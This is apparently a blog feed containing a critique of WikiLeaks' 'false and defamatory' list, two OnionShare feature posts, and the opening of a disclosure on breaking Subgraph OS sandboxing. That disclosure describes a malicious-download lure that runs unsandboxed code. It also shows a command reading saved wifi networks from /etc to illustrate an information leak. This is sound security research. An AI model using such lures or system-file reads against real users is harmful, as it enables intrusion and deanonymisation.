<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/uyCOy25GdjQ" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><h3 id="the-pizzagate-conspiracy-theory">The Pizzagate conspiracy theory</h3><p>After WikiLeaks published the Podesta emails and right-wing idiots started sifting through them, they decided that whenever an email mentioned going out for pizza, it was actually a secret code. They concluded that these "pizza" references could only mean that high-ranking Democrats were actually involved in a child sex ring based in the basement of the Comet Ping Pong pizza place in Washington, DC. Edgar Maddison Welch decided to "investigate" Pizzagate, and drove up to DC from North Carolina, bringing three guns with him. When he got to Comet Ping Pong (which, by the way, doesn't have a basement), he fired a gun. He was <a href="https://www.nytimes.com/2017/06/22/us/pizzagate-attack-sentence.html">sentenced</a> to four years in prison.</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks promoted or invented the “pizzagate” conspiracy theory.</em></p>
<p>It would be a lot easier to believe that WikiLeaks didn't promote the Pizzagate conspiracy if they weren't hosting a wiki page in order to discuss the conspiracy theorists' findings at <a href="https://our.wikileaks.org/Pizzagate">https://our.wikileaks.org/Pizzagate</a>. (Shocking, right? Who realized WikiLeaks actually included a wiki!)</p>
<p>To be fair, the wiki pages include a disclaimer saying, "It is NOT an endorsed by WikiLeaks for quality of the material, content, or judgement" -- but I mean seriously. You don't see ProPublica hosting community forums for conspiracy theorists. Why is WikiLeaks?</p>
<h3 id="other-conspiracy-theories">Other conspiracy theories</h3><p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote a “conspiracy theory”.</em></p>
<p>Seth Rich and Pizzagate are far from the only ones. WikiLeaks and Assange make off-hand conspiracy-ridden comments on a regular basis. In fact, I <a href="https://twitter.com/wikileaks/status/1000795757983780865">noticed</a> WikiLeaks dip into the QAnon conspiracy theory in a reply to Roseanne Barr (if you'd like to lose some critical thinking skills, read the Twitter thread WikiLeaks is commenting on, and the replies to WikiLeaks; the QAnon people were pissed that WikiLeaks wasn't a true believer):</p>
<p><img src="wikileaks-conspiracy1.png" alt=""></p>
<p>So, as one does on Twitter, I made fun of them. But I guess they are pro-censorship after all because they blocked me for it. (Just kidding, blocking people on Twitter obviously isn't censorship.)</p>
<p><img src="wikileaks-conspiracy2.png" alt=""></p>
<h3 id="freedom-of-the-press-foundation-and-securedrop">Freedom of the Press Foundation and SecureDrop</h3><p>After Emma Best published the complete list of 140 things you're not allowed to say about WikiLeaks, WikiLeaks <a href="https://twitter.com/wikileaks/status/1082279551521169408">tweeted out</a> a link to the list themselves, which they published on Pastebin. Unsurprisingly, they edited the list first, presumably to remove claims they have a harder time defending. Here's one of the ones they removed:</p>
<p><em>It is false and defamatory to deny that Julian Assange co-founded the Freedom of the Press Foundation with John Perry Barlow.</em></p>
<p>WikiLeaks and Assange have done a good job at deleting the tweets where they first made this claim, but it's not true.</p>
<p>Barlow was one of the co-founders of FPF, and he did have a conversation with Assange about starting a new organization that could help bypass the financial censorship WikiLeaks was facing. But that's extend of Assange's role. Having a conversation with a founder doesn't make you a founder.</p>
<p>However, during a Twitter fight I was involved in, an official WikiLeaks account did make the <a href="https://twitter.com/WLTaskForce/status/826569015095021568">claim</a> that <em>I'm not</em> a co-founder of FPF.</p>
<p><img src="wltaskforce-fpf-founder.png" alt=""></p>
<p>When FPF was founded, I was the first (and only, at the time) staff, the chief technology officer. I built the FPF website, including the crowd-funding platform that we used to help WikiLeaks bypass financial censorship. Here's the initial commit I made on the FPF website, from October 30, 2012 (FPF officially launched on December 17, 2012):</p>
<p><img src="fpf-initial-commit.png" alt=""></p>
<p>After starting work at The Intercept, I stepped down as CTO and was voted onto the board of directors.</p>
<p>That Twitter fight started because I <a href="https://twitter.com/micahflee/status/826560111304773632">called out</a> WikiLeaks for taking credit for Aaron Swartz's work, after he died and couldn't defend himself.</p>
<p><img src="securedrop.png" alt=""></p>
<p>It apparently struck such a chord that WikiLeaks included this in their "false and defamatory" censorship list:</p>
<p><em>It is false and defamatory to suggest that Julian Assange is not the sole first inventor of cryptographically secure “drop boxes” to protect whistleblowers and journalistic sources.</em></p>
<p>It's true that Aaron was inspired by WikiLeaks when he began development the DeadDrop project (which was later renamed to SecureDrop) in June 2011. But SecureDrop isn't "WikiLeaks technology." The WikiLeaks leak platform is proprietary, and unlike SecureDrop (which is a free software project) has never had a public security audit. Saying SecureDrop is WikiLeaks technology is a bit like saying "the iPhone is Nokia technology."</p>
<p>But both leak platforms share a common critical component: anonymity of sources is enforced by making the leak site only available using a Tor onion service. Tor Project, not WikiLeaks, deserves the credit for the "cryptographically secure" part of the WikiLeaks leak platform.</p>
<p>It could be true that WikiLeaks was the first to <em>have the idea</em> of using a Tor onion service as a whistleblower drop box though. It was a good idea.</p>
<h3 id="defending-vladimir-putin">Defending Vladimir Putin</h3><p>In 2015, an anonymous source leaked a massive trove of tax haven data to a German newspaper, who enlisted the help of the International Consortium of Investigative Journalists (ICIJ) to report on it all. ICIJ shared the data with dozens of partners, including the <a href="https://www.occrp.org/en">Organized Crime & Corruption Reporting Project</a> (OCCRP). This leak was known as the Panama Papers, and in revealed scandals around the world, investigated by over 100 newsrooms, and reported in 25 languages.</p>
<p>One of these scandals, reported by OCCRP in collaboration with investigative journalists at the Russian newspaper Novaya Gazeta, <a href="https://www.occrp.org/en/panamapapers/persons/putin/">implicated Putin's close friend Sergei Roldugin</a>. Roldugin, a cellist, was implicated in stealing $230 million from Russian tax payers in 2007. Putin was angry about the scandal, and so was WikiLeaks, it turned out.</p>
<p><img src="wikileaks-putin1.png" alt=""></p>
<p><img src="wikileaks-putin2.png" alt=""></p>
<p>Keep in mind that the documents were real, and the Putin-linked corruption that was revealed actually happened. After WikiLeaks tweeted in Putin's defense, <a href="https://twitter.com/micahflee/status/950778944940158976">Putin himself cited WikiLeaks</a> in order to dismiss the scandal:</p>
<blockquote><p>“Besides,” [Putin] added, “we now know from WikiLeaks that officials and state agencies in the United States are behind all this.”</p>
</blockquote>
<p><em>It is false and defamatory to suggest that Julian Assange called the Panama Papers “a Soros-funded attack against Putin” [see <a href="https://twitter.com/wikileaks/status/717810984673484800">https://twitter.com/wikileaks/status/717810984673484800</a>].</em></p>
<p>Sure, they didn't use the words "Soros-funded," though they included "Open Society Institute & Soros Foundations Network" in their tweet calling this (true, brave, risky for Russian journalists) investigative journalism an "attack story on Putin."</p>
<p>I wrote a <a href="https://twitter.com/micahflee/status/950778501270917120">Twitter thread</a> about this topic that goes into greater detail. That's just one example of WikiLeaks protecting Putin's government. Here's another:</p>
<p>In 2012, WikiLeaks published a trove of over two million hacked emails from the Syrian government, called the <a href="https://wikileaks.org/Syria-Files.html">Syria Files</a>. But, according to <a href="https://www.dailydot.com/layer8/wikileaks-syria-files-syria-russia-bank-2-billion/">court records</a> about the hacktivists that breached Syria's computers, obtained by the Daily Dot, WikiLeaks withheld an email from the Syria Files. This email described a €2 billion transaction between the Syrian government and a state-owned Russia bank. It appears that WikiLeaks selectively suppressed this email to avoid implicating the Russian government.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever suppressed materials critical of Israel, Russia or any other State.</em></p>
<p>I'm gonna call this one a lie.</p>
<h3 id="anti-semitism-and-the-far-right">Anti-Semitism and the far right</h3><p>Julian Assange appears to have a problem with Jews. I first noticed when WikiLeaks tweeted this (they've since deleted it):</p>
<p><img src="wikileaks-antisemite1.jpg" alt=""></p>
<p>The parentheses refer to a neo-Nazi meme called "echoes," which identifies Jews online by surrounding their names with three parentheses. In response to the meme, many Jewish people and some allies began to bracket their names on Twitter in a show of solidarity.</p>
<p>Shortly after that tweet, in a private Twitter DM group, WikiLeaks called Jewish investigative journalist Raphael Satter a "rat," after he tweeted an article he wrote for the Associated Press about the harm caused when WikiLeaks publishes private information about individuals. (A member of this Twitter DM group leaked the incredibly revealing messages to me, and I <a href="https://theintercept.com/2018/02/14/julian-assange-wikileaks-election-clinton-trump/">reported</a> on them for The Intercept. You can also see my Twitter thread about these leaked DMs <a href="https://twitter.com/micahflee/status/963852295271104512">here</a>.)</p>
<p><img src="wikileaks-antisemite2.jpg" alt=""></p>
<p>WikiLeaks then instructed the followers to "Bog him down. Get him to show his bias." (Those leaked DMs show a pattern of WikiLeaks leading troll campaigns like this one.)</p>
<p>People used to be able to donate to WikiLeaks using the FPF website, a system we set up in order to bypass the financial censorship that WikiLeaks was facing. But at the end of 2017, after WikiLeaks failed to show us any evidence that the 2010 financial blockade against them was still ongoing, the FPF board of directors <a href="https://freedom.press/news/beyond-blockade/">unanimously voted</a> to take down our WikiLeaks donate button (they could still receive credit card donations through a separate non-profit in Europe). In response, WikiLeaks orchestrated a troll campaign against me personally (I describe it in <a href="https://twitter.com/micahflee/status/948999951853301760">this Twitter thread</a> if you're interested).</p>
<p>As part of the trolling campaign, Assange called us rats, and an official WikiLeaks Twitter account, along with swarms of WikiLeaks fans, piled on, using other anti-Semitic imagery and language.</p>
<p><img src="wikileaks-antisemite3.jpg" alt=""></p>
<p><img src="wikileaks-antisemite4.jpg" alt=""></p>
<p>Nazis and other anti-Semites have a <a href="https://www.theguardian.com/artanddesign/shortcuts/2015/nov/18/rats-the-history-of-an-incendiary-cartoon-trope">long history</a> of calling people they despise, like Jews and immigrants, rats.</p>
<p>And here's another tidbit of evidence of anti-Semitism. In 2014, someone Assange hired to ghostwrite his memoir, who ended up turning down the job, <a href="https://www.lrb.co.uk/v36/n05/andrew-ohagan/ghosting">described</a> bigoted ramblings "in which he’d uttered, late at night, many casual libels, many sexist or anti-Semitic remarks, and where he spoke freely about every aspect of his life."</p>
<p><em>It is false and defamatory to suggest that Julian Assange is an anti-semite.</em></p>
<p>Like many of the things on the "false and defamatory" list, this one is subjective. But, from my perspective, it's pretty clear that he's an anti-Semite.</p>
<p>But that's not all. Assange started showing signs of anti-Semitism long before 2016 though. In 2013, former WikiLeaks employee James Ball <a href="https://www.thedailybeast.com/exclusive-former-wikileaks-employee-james-ball-describes-working-with-julian-assange">described</a> his falling out with Assange in an article for the Daily Beast:</p>
<blockquote><p>The reason I quit was because of a friend of Julian’s whose activities were unstomachable and unforgivable. That man was Israel Shamir. Shamir is an anti-Semitic writer, a <a href="http://www.counterpunch.org/2010/12/31/the-minsk-election-in-a-wikileaks-mirror/">supporter of the dictator of Belarus</a>, and a man with ties and friends in Russian security services. He and Julian -- unknown to us -- had been in friendly contact for years. It was a friendship that would have serious consequences.</p>
<p>Introduced to WikiLeaks staff and supporters under a false name, Shamir was given direct access to more than 90,000 of the U.S. Embassy cables, covering Russia, all of Eastern Europe, parts of the Middle East, and Israel. This was, for quite some time, denied by WikiLeaks. But that’s never a denial I’ve found convincing: the reason I know he has them is that I gave them to him, at Assange’s orders, not knowing who he was.</p>
<p>Why did this prove to be a grave mistake? Not just for Shamir’s views, which are easy to Google, but for what he did next. The first hints of trouble came through contacts from various Putin-influenced Russian media outlets. A pro-Putin outlet got in touch to say Shamir had been asking for $10,000 for access to the cables. He was selling the material we were working to give away free, to responsible outlets.</p>
<p>Worse was to come. The <a href="http://www.indexoncensorship.org/2011/02/wikileaks-belarus-and-israel-shamir/">NGO Index on Censorship</a> sent a string of questions and some photographic evidence, suggesting Shamir had given the cables to Alexander Lukashenko of Belarus, Europe’s last dictator. Shamir had written a pro-Belarus article, shortly before photos emerged of him leaving the interior ministry. The day after, Belarus’s dictator gave a speech saying he was establishing a WikiLeaks for Belarus, citing some stories and information appearing in the genuine (and then unpublished) cables.</p>
</blockquote>
<p>With that in mind, check out these next items on the WikiLeaks censorship list:</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange shared documents with a dictator.</em></p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks ever employed, or contracted, a holocaust denier.</em></p>
<p>Assuming James Ball is telling the truth, then both of those are lies.</p>
<p>That's still not all. In August 2017, Assange welcomed (now former) pro-Putin Rep. Dana Rohrabacher (R-California) and Holocaust-denying alt-right icon Chuck Johnson to visit him in the Ecuadorian Embassy in London, <a href="https://dailycaller.com/2017/08/16/exclusive-republican-congressman-meets-with-wikileaks-founder-julian-assange/">according to</a> the Daily Caller. They were hoping to negotiate some sort of deal with Trump, but former White House Chief of Staff John Kelly <a href="https://theintercept.com/2018/02/14/dana-rohrabacher-trump-russia-wikileaks-julian-assange/">prevented</a> Rohrabacher from later briefing Trump about the meeting.</p>
<p>After Assange's role in the 2016 election, David Duke, former grand wizard of the Ku Klux Klan, personally <a href="https://twitter.com/DrDavidDuke/status/796263508124037120">thanked</a> Assange.</p>
<p><img src="wikileaks-davidduke.png" alt=""></p>
<p>Assange still, to this day, hasn't disavowed this sort of support from neo-Nazis or members of the KKK.</p>
<p><em>It is false and defamatory to suggest that Julian Assange is “far left’ or “far right”.</em></p>
<p>While again, this is subjective and nuanced, "far right" is a fairly accurate description of Assange. Or, at least, "allied with the far right."</p>
<h3 id="perfect-record">Perfect record</h3><p>There's one item on the list that stood out for because it was actually true.</p>
<p><em>It is false and defamatory to suggest that WikiLeaks does not have a perfect record of accurately verifying its publications.</em></p>
<p>As far as I can tell, WikiLeaks does indeed have a perfect record of publishing real, and often times very newsworthy, document sets on their website.</p>
<p>WikiLeaks seems to keep its lies and conspiracy theories off of wikileaks.org (with the exception of our.wikileaks.org). Instead, WikiLeaks prefers to spread its misinformation on Twitter, in interviews, and on rambling screeds posted to Pastebin.</p>
<h4 id="update-january-11-2019">Update January 11, 2019:</h4><p>Someone pointed out a few WikiLeaks conspiracy theory tweets that I didn't know about.</p>
<p>WikiLeaks <a href="https://twitter.com/wikileaks/status/794450623404113920?lang=en">tweeted</a> an article, written by white supremacist and alt-right icon Cassandra Fairbanks, that promoted the "John Podesta engaged in satanic rituals" conspiracy theory, making this item on the censorship list contain at least two lies:</p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote alleged conspiracy theories claiming “John Podesta engaged in satanic rituals”, the “Democratic Party had Seth Rich Killed”, “Clinton wore earpieces to the 2016 US election debates”, on “Clinton’s health” or “Clinton kidnapping children”.</em></p>
<p><img src="wikileaks-satanic.png" alt=""></p>
<p>In order to promote the Pizzagate conspiracy, WikiLeaks <a href="https://twitter.com/wikileaks/status/821595404500430848?lang=en">tweeted</a> a Ben Swann video segment (which appears to now be taken down) about Pizzagate.</p>
<p>(Wikipedia <a href="https://en.wikipedia.org/wiki/Ben_Swann">says</a> Swann "created the series, Reality Check, which he used to espouse conspiracy theories, such as Pizzagate, and those surrounding the Aurora, Colorado and Sandy Hook Elementary School shootings and the 9/11 attacks," and, "He was forced by his employer to bring down the internet media channel and most of his social media sites in 2017. He was fired in 2018 from CBS affiliate WGCL-TV in Atlanta, Georgia for pursuing his Reality Check show and alt-right theories, particularly Pizzagate.")</p>
<p>As a bonus, they also included a handy link to an FBI document describing pedophile symbols, for all their Pizzagate followers. Which just adds the lies already discussed above in these items:</p>
<p><em>It is false and defamatory to suggest that Julian Assange or WikiLeaks promoted or invented the “pizzagate” conspiracy theory.</em></p>
<p><em>It is false and defamatory to suggest that WikiLeaks or Julian Assange has ever published, uttered or tried to promote a “conspiracy theory”.</em></p>
<p><img src="wikileaks-pizzagate.png" alt=""></p>
<p>WikiLeaks <a href="https://twitter.com/wikileaks/status/782906224937410562">tweeted</a> a report from the right-wing fake news website TruePundit claiming that Hillary Clinton said, "Can't we just drone the guy?" about Assange. But they didn't just tweet it. As the Daily Kos <a href="https://www.dailykos.com/stories/2016/11/2/1590342/--True-Pundit-and-Drone-this-Guy-A-brief-update-from-the-conspiracy-theory-machine-factory">describes</a>, "Heck, Wikileaks tweeted it in monospace font with yellow highlight! That means it’s from some leaked document, right? Well, actually, Wikileaks put text from a right-wing website, TruePundit, in monospace font and highlighted the relevant quote." (Snopes <a href="https://www.snopes.com/fact-check/julian-assange-drone-strike/">says</a> Clinton calling for a drone strike against Assange is "unproven.")</p>
<p>I'm not sure what items on the censorship list this one relates to. But in any case, they clearly don't have a problem with promoting misinformation and fake news if the message is right.</p>
<p><img src="wikileaks-fakenews.png" alt=""></p>
Do you want to contribute to the next major version of OnionShare?2018-12-22T00:00:00ZMicah Leeurn:uuid:d212d70e-c979-3d4a-95ee-25166e9a68c6<p><a href="https://onionshare.org/">OnionShare</a> lets you securely and anonymously send and receive files. It works by starting a web server, making it accessible as a Tor onion service, and generating an unguessable web address so others can download files from you, or upload files to you. It does <em>not</em> require setting up a separate server or using a third party file-sharing service.</p>
<p>Over the last 10 months volunteer developers, designers, translators, and I have been hard at work on OnionShare 2.0, and it’s nearly ready. If you’d like to chip in during the month or so before the final release, <strong>try out the <a href="https://github.com/micahflee/onionshare/releases/tag/v2.0.dev2">latest development version</a> and report any bugs</strong>. The best way to report bugs is by <a href="https://github.com/micahflee/onionshare/issues/new">opening an issue</a> on GitHub and describing the problem, or you can send me an email at micah@micahflee.com if you don’t have a GitHub account.</p>
<p>And if you are a native speaker of a language other than English, <strong>we can use your help making OnionShare available in your language</strong>. If you’d like to help, check out the <a href="https://github.com/micahflee/onionshare/wiki/Translating">wiki page</a> about translating, and go make a <a href="https://hosted.weblate.org/projects/onionshare/translations/">Weblate account</a> to start translating the English strings into your native language. To give translators time to work we’re waiting about a month to release the final version. (OnionShare has supported multiple languages for a long time, but only in an unusable, half-assed kind of way. If you used a non-English language, only like 30% of OnionShare would appear in your language (if it was supported at all), and most was just displayed in English. The translation workflow was really bad: translators, many of whom aren’t programmers, had to submit pull requests on GitHub. It’s much better now.)</p>
<p>This version of OnionShare is loaded with new features. I’ll go into them all in more detail once it’s finally released, but here’s what you should know about a few of them.</p>
<p><strong>Receive mode:</strong> Instead of just using OnionShare to send files to others, you can now use it as an anonymous dropbox of your own. Open OnionShare, switch to the “Receive Files” tab, and click start. After it finishes creating a Tor onion service, give the URL to other people. When they load it in Tor Browser, they’ll be able to <em>upload</em> files directly to your computer. (Be careful: all the same warnings about malicious email attachments apply here. Don’t open random files from strangers unless you know what you’re doing, because they could try to hack your computer.)</p>
<p><strong>Support for next generation (v3) onion service:</strong> OnionShare 2.0 finally supports the <strong>new, more secure, type of Tor onion services</strong>. This was tricky to get working, and it actually involved discovering two separate bugs in upstream Tor (<a href="https://trac.torproject.org/projects/tor/ticket/25552">this</a> and <a href="https://trac.torproject.org/projects/tor/ticket/28619">this</a>). v3 onion services are only supported if you’re using the very latest development release of Tor. The Windows and Mac versions of OnionShare 2.0 will bundle a version of Tor that supports them. If you want to try them in this dev release you’ll need to configure OnionShare to connect to a <a href="https://github.com/micahflee/onionshare/wiki/Connecting-to-Tor#using-a-system-tor-in-linux">system Tor</a>, and install at least Tor 0.4.0.0, which Debian-like users can get from the Tor nightly-master <a href="https://www.torproject.org/docs/debian.html.en">repository</a>.</p>
<p>The final version of OnionShare 2.0 will probably be released in late January or early February 2019.</p>
<p><img src="onionshare-receive-client.png" alt="OnionShare's new receive mode feature"></p>
OnionShare has some exciting new features2018-02-26T00:00:00ZMicah Leeurn:uuid:b6c91fd3-98e1-341b-91d2-e66422c8def9<p>It’s been some time since I’ve written about OnionShare, so I thought I’d write an update on all of the latest work. Today we released version 1.3 (and last month we released 1.2, so the releases are getting more frequent). You can get the latest version at onionshare.org.</p>
<p>But first, I owe a huge thanks to <a href="https://twitter.com/_mig5">Miguel Jacq</a> for churning out new features, taking over a lot of the GitHub issue triaging responsibilities, and becoming a core OnionShare developer.</p>
<p>If you haven’t tried it out in awhile, here are some things that are new:</p>
<p>The user interface has a <em>major</em> upgrade. It’s now much more clear exactly what steps you’re supposed to take at every point, and it looks a bit more like a modern piece of software. In addition to the OnionShare interface getting redesigned, the client-side web interface — what people receiving the files with Tor Browser see — also has a new look:</p>
<p><img src="onionshare-client.png" alt=""></p>
<p>(That’s Tor Browser running in a disposable Whonix AppVM in Qubes, by the way.)</p>
<p>I owe a huge thanks to <a href="https://keybase.io/glennsorrentino">Glenn Sorrentino</a> for, nine months ago, doing a formal user study of OnionShare users and designing a brand new user experience that only now, in version 1.3, is seeing the light of day. Glenn also redesigned the onionshare.org website!</p>
<p>OnionShare now bundles a copy of Tor with it (and has since May 2017), which means there’s no need to have Tor Browser open in the background anymore. Instead, OnionShare connects to Tor itself.</p>
<p><img src="onionshare-bundled-tor.png" alt=""></p>
<p>Because OnionShare can now control its own Tor process, it’s now also possible for censored users in countries like China to connect to the Tor network using bridges, from within OnionShare. Bridge support was first added last month, and support for meek bridges was added to 1.3 (for Linux only at the moment).</p>
<p><img src="onionshare-bridges.png" alt=""></p>
<p>Here’s more information about how to <a href="https://github.com/micahflee/onionshare/wiki/Connecting-to-Tor">connect to Tor</a>, and <a href="https://github.com/micahflee/onionshare/wiki/Using-Bridges">using bridges</a>, in OnionShare.</p>
<p>Another recent feature is the auto-stop timer. Already, OnionShare will stop the share as soon as the first download finishes (you can disable this in the settings if you want to send files to multiple people). But now, if the receiver doesn’t download the file after a specified amount of time, OnionShare will automatically stop sharing for you. For example, here I’m sharing a screenshot, but the share will automatically stop at 2pm:</p>
<p><img src="onionshare-autostop1.png" alt=""></p>
<p>Once you start the share, you can see a countdown of seconds remaining before it stops on its own. (If the receiver starts downloading before that countdown finishes though, they’ll be able to finish downloading all the files no matter how long the download takes.)</p>
<p><img src="onionshare-autostop2.png" alt=""></p>
<p>Here’s more information about <a href="https://github.com/micahflee/onionshare/wiki/Using-the-Auto-Stop-Timer">using the auto-stop timer</a>.</p>
<p>Another feature is persistent OnionShare addresses. By default, every time you share something, OnionShare generates a brand new URL, and soon as you’re done sharing it that URL no longer exists, and never will exist again. But now, you can change a setting that will allow you to re-use the same OnionShare URL for multiple shares.</p>
<p>This might come in handy in any situation where you want to send someone files, but you don’t want to have any online communication channel with them. For example, let’s say a whistleblower (Alice) meets a journalist (Bob) in person. Alice can hand Bob a piece of paper with an OnionShare address on it and tell him to check it every night at a specific time. Now, Alice can continually anonymously send files to Bob without needing to communicate new OnionShare addresses every time. Here’s more information about <a href="https://github.com/micahflee/onionshare/wiki/Using-a-Persistent-URL">persistent addresses</a>.</p>
<p>Another advanced feature that’s been added is support for stealth, or authenticated, onion services. These are Tor onion services that are much more private, but are also harder to use. The sender needs to share both the OnionShare address but also a HidServAuth string, and the receiver needs to add this HidServAuth string to their torrc file before they’ll be able to connect to it. (This is why it’s an advanced feature, it’s not quite practical for beginners to do this without a lot of troubleshooting.) Here’s more information about using <a href="https://github.com/micahflee/onionshare/wiki/Stealth-Onion-Services">stealth onions</a> in OnionShare.</p>
<p>On a similar note, you might be wondering about OnionShare support for next generation Tor onion services, which are more secure and private than existing onion services. There is an <a href="https://github.com/micahflee/onionshare/issues/461">open issue</a> for this, but currently it’s blocked until an upstream project that OnionShare relies on, <a href="https://stem.torproject.org/">stem</a>, adds support for ephemeral next gen onion services itself. However, the OnionShare website itself is now accessible using a next gen onion service, and OnionShare will load it to check for available updates:</p>
<pre><code>http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion/
</code></pre>
<p>I’ve described some of the newest and biggest features in OnionShare, but it’s not nearly an exhaustive list. There are many more, including a system tray icon with desktop notifications, the ability to cancel shares before they finish starting, translations into several languages, checking for updates automatically, among others. Oh, and since January 2017, OnionShare has been <a href="https://tails.boum.org/doc/anonymous_internet/onionshare/index.en.html">built-in to the Tails operating system</a> too!</p>
<p>I’m striving to make OnionShare a contributor-friendly open source project. Pull requests are always welcome, and in fact <a href="https://github.com/micahflee/onionshare/graphs/contributors">51 different people</a> have already contributed code.</p>
<p>If you’d like to get involved in OnionShare development:</p>
<ul>
<li>Read the <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">Developing OnionShare</a> page on the wiki</li>
<li>Join the new (and so far extremely low-traffic) <a href="https://lists.riseup.net/www/subscribe/onionshare-dev">mailing list</a> for OnionShare developers and designers</li>
<li>Checkout the GitHub <a href="https://github.com/micahflee/onionshare/issues">issues page</a> for bugs or enhancements to work on, or open your own issues if there are features you’d like to develop</li>
</ul>
Breaking the Security Model of Subgraph OS2017-04-11T00:00:00ZMicah Leeurn:uuid:b934a8f2-14b2-30fd-a7f6-8307d2c9256e<p>I recently traveled to Amsterdam to attend a meeting with Tor Project staff, volunteers, and other members of the wider Tor community. Before trips like this, I prepare a separate travel computer, only bringing with me data and credentials that I might need during my trip. My primary laptop runs <a href="https://www.qubes-os.org/">Qubes</a>, but this time I decided to install <a href="https://subgraph.com/sgos/index.en.html">Subgraph OS</a> on my travel laptop. I had only briefly messed with it before, and there’s no better way to learn about a new operating system than by forcing yourself to actually use it for a few days.</p>
<p>Subgraph OS is an “adversary resistant computing platform.” It’s similar to <a href="https://tails.boum.org/">Tails</a> in that it’s based on Debian and all traffic is forced through Tor (that’s changing though: there’s now basic support for <a href="https://subgraph.com/sgos/documentation/clearnet-chromium/">clearnet Chromium</a> and <a href="https://twitter.com/subgraph/status/846455144648785921">OpenVPN</a>). It uses a grsecurity Linux kernel, and many apps run in “oz sandboxes”, a homebrew sandbox solution that protects you even if an attacker manages to exploit a bug in one of these apps. Subgraph OS also includes the Subgraph Firewall, an application firewall similar to Little Snitch for macOS — something that’s pretty awesome, and hasn’t really existed in the Linux ecosystem before. Basically, it’s designed to be an easy-to-use Linux distro that’s extremely secure.</p>
<p>Joanna Rutkowska, the brains behind Qubes, was at the Tor meeting as well. We sat down together and started poking at Subgraph OS to see if we could break its security model, and we succeeded! After we discovered weaknesses, I polished them into a working exploit.</p>
<iframe src="https://www.youtube-nocookie.com/embed/SVsllZ7g7-I?rel=0" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe><p>Subgraph publishes a user manual called the Subgraph OS Handbook. You can find the code for it <a href="https://github.com/subgraph/sgos_handbook">on GitHub</a>. I made a fake website with a link to download this git repository, compressed as a zip file. A realistic targeted attack would probably use different bait — perhaps an attacker would send a journalist some juicy documents — but the point is, the user downloads something from a website, or maybe from their email, and then double-clicks a document to open it. Subgraph OS, with its grsecurity Linux kernel and oz sandboxes, is supposed to prevent malicious documents from taking over your computer, but in this case it doesn’t.</p>
<p>I reported what we found to the Subgraph developers and offered to give them time to resolve the issues before I published this post. They said that none of what I reported was surprising, that Subgraph OS is still in alpha, and that they don’t recommend that people use it yet. But that’s funny, because <a href="https://archive.is/A1OCP">their website</a> doesn’t seem to include that warning — it describes a list of amazing security features, ending with, “Try the Subgraph OS Alpha today. You can install it on a computer, run it as a live-disk, or use it in a VM.”</p>
<p>They didn’t ask for more time, and they haven’t resolved the issues yet.</p>
<p>To be fair, Subgraph OS <em>is</em> still in alpha, and already it’s more secure by default than many other Linux distros. This same attack also works against Tails, Debian, Ubuntu, Fedora, Arch, etc. (not Qubes though).</p>
<p><strong>How oz sandboxing works</strong></p>
<p>Subgraph comes with sandboxes for 22 applications — things like Tor Browser, OnionShare, Evince (PDF reader), Eye of GNOME (image viewer), Icedove (email client), and VLC (media player). If you run a program that doesn’t have an oz sandbox (such as Nautilus, the built-in file manager, or anything that isn’t one of those 22 programs), then it runs unsandboxed, with access to all your user data.</p>
<p>If you open a malicious PDF that exploits a bug in Evince, the sandbox will limit what the attacker can do. It blocks internet access, so the attacker can’t phone home. It restricts what Linux system calls can be made to only what evince needs to work. It limits access to the filesystem. On a normal Linux computer, if an attacker hacks Evince, they can access all of the user’s data in their home directory (documents, email, PGP and SSH keys, etc.), but the Evince oz sandbox prevents the attacker from accessing any documents except the one that the user opened.</p>
<p>Oz sandboxes themselves seem pretty good at a glance. Though I did find some information leakage. I discovered that /etc is readable. So if you run ls /etc/NetworkManager/system-connections, you can see a list of the computer’s saved wifi networks, even within the sandbox. In oz sandboxes that allow internet access (like the Tor Browser one), this information could be sent back to the attacker — there’s likely other juicy data in there too. When I reported this, the Subgraph devs pointed me to <a href="https://github.com/subgraph/oz/issues/20">this year-old github issue</a>, showing that they’ve thought about it.</p>
<p><strong>The problem with Subgraph OS’s sandbox approach</strong></p>
<p>Oz sandboxes are similar to <a href="https://developer.apple.com/library/content/documentation/Security/Conceptual/AppSandboxDesignGuide/AboutAppSandbox/AboutAppSandbox.html">macOS app sandboxes</a> — they lock down what specific apps can do so that if those apps get hacked, the attacker is hopefully stuck in the sandbox with very limited access. While this is great, it’s an incomplete solution to endpoint security.</p>
<p>For one thing, most of the programs you run in Subgraph <em>aren’t</em> sandboxed. Most of GNOME isn’t. Nautilus, the graphical file manager, isn’t, and neither is the terminal app. If an attacker can trick a user into running an unsandboxed script in either Nautilus (what my attack does) or in the terminal, it’s game over. If the user installs custom software that doesn’t have an oz profile, and an attacker exploits this software, it’s also game over.</p>
<p>An attacker that gets unsandboxed remote code execution in Subgraph OS has a lot of access. They can see, and exfiltrate, all of the user’s data: PGP keys, SSH keys, stored email, documents, password databases, and everything else. They can listen from the microphone and watch through the webcam. They can learn the network interface’s MAC address, and see nearby wifi access points and bluetooth devices, which can be used to deanonymize the user. They can install a persistent backdoor in your computer.</p>
<p>For another, there’s no way to compartmentalize different parts of your computer for different purposes like you can in Qubes. You can’t make a separate sandbox for working with some untrusted documents, or for keeping certain secrets extra secure, or for managing different anonymous identities online. All of your data in Subgraph OS, at some point, risks getting accessed by unsandboxed programs.</p>
<p>I won’t go into detail about how Qubes does it except to say that it’s a somewhat opposite approach. You have a thin, unsandboxed layer that has total control over your computer, and then <em>everything</em> else is run inside of sandboxes. Qubes also protects sandboxed apps from reading potentially sensitive data off of your clipboard (unless you want it to), and it protects your administrative domain from untrusted input coming from your network drivers and your USB stack. (It’s the only operating system that I’m aware of that, out-of-the-box, protects against BadUSB attacks.)</p>
<p><strong>Hacking the Free Desktop with .desktop files</strong></p>
